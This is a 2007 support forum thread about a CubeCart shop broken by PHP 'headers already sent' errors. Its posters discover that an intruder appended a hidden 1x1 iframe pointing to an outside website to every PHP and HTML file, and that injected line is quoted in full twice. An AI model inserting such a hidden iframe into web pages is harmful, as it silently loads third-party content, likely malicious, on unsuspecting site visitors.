Jump to content

CubeCart not working ... Headers Already Sent?


Guest dragonimpact

Recommended Posts

Guest dragonimpact

Hi,

I received this message today :

"

Domain Name: dragonimpact.com

Date/Time: June 24th, 2007 @ 5:18 AM

The following installations are not up-to-date:

WebCalendar:

+ /calendar - 1.0.4 (1.0.5)

"

And now my CubeCart Shopping Cart isn't working it states this error message :

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/dragoni/public_html/cart/includes/ini.inc.php:140) in /home/dragoni/public_html/cart/includes/sessionStart.inc.php on line 40

"

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/dragoni/public_html/cart/includes/ini.inc.php:140) in /home/dragoni/public_html/cart/includes/sessionStart.inc.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /home/dragoni/public_html/cart/includes/ini.inc.php:140) in /home/dragoni/public_html/cart/includes/session.inc.php on line 73

"

This problem came out of the blue. I have not made changes recently and I had an order just placed last night via my website and no problems were mentioned by my customer.

Also, I can't login into Administration, I get this error message :

"

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/dragoni/public_html/cart/includes/ini.inc.php:140) in /home/dragoni/public_html/cart/admin/includes/auth.inc.php on line 45

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/dragoni/public_html/cart/includes/ini.inc.php:140) in /home/dragoni/public_html/cart/admin/includes/auth.inc.php on line 45

Warning: Cannot modify header information - headers already sent by (output started at /home/dragoni/public_html/cart/includes/ini.inc.php:140) in /home/dragoni/public_html/cart/admin/includes/auth.inc.php on line 49

"

Please help.

Thanks,

Alex.

Link to comment
Share on other sites

Guest dragonimpact

Do a search for 'headers already sent' as this has been covered before. Also check out the pinned posts.

I did a search for 'headers already sent' and only my and your post came up.

Anyways, I found the problem.

Turns out someone hacked into my site and added the following line to every HTML, HTM and PHP file on my site.

<iframe src="http://mckeownrealestate.com/home2.html" width=1 height=1></iframe>

This one line of code was entered at the bottom of EVERY file that ended in PHP, HTML and HTM.

Any ideas how I protect myself from this happening again?

Thanks.

Link to comment
Share on other sites

  • 2 weeks later...
Guest aimKevinwolf2k5

Do a search for 'headers already sent' as this has been covered before. Also check out the pinned posts.

I did a search for 'headers already sent' and only my and your post came up.

Anyways, I found the problem.

Turns out someone hacked into my site and added the following line to every HTML, HTM and PHP file on my site.

<iframe src="http://mckeownrealestate.com/home2.html" width=1 height=1></iframe>

This one line of code was entered at the bottom of EVERY file that ended in PHP, HTML and HTM.

Any ideas how I protect myself from this happening again?

Thanks.

Im getting this same problem on my entire site.

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/orderrag/public_html/language/en/lang.inc.php:1) in /home/orderrag/public_html/admin/includes/auth.inc.php on line 45

Warning: Cannot modify header information - headers already sent by (output started at /home/orderrag/public_html/language/en/lang.inc.php:1) in /home/orderrag/public_html/admin/includes/auth.inc.php on line 49

It started suddenly & there are hacked iframes in mine. My entire site is screwy.

HEEELP

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...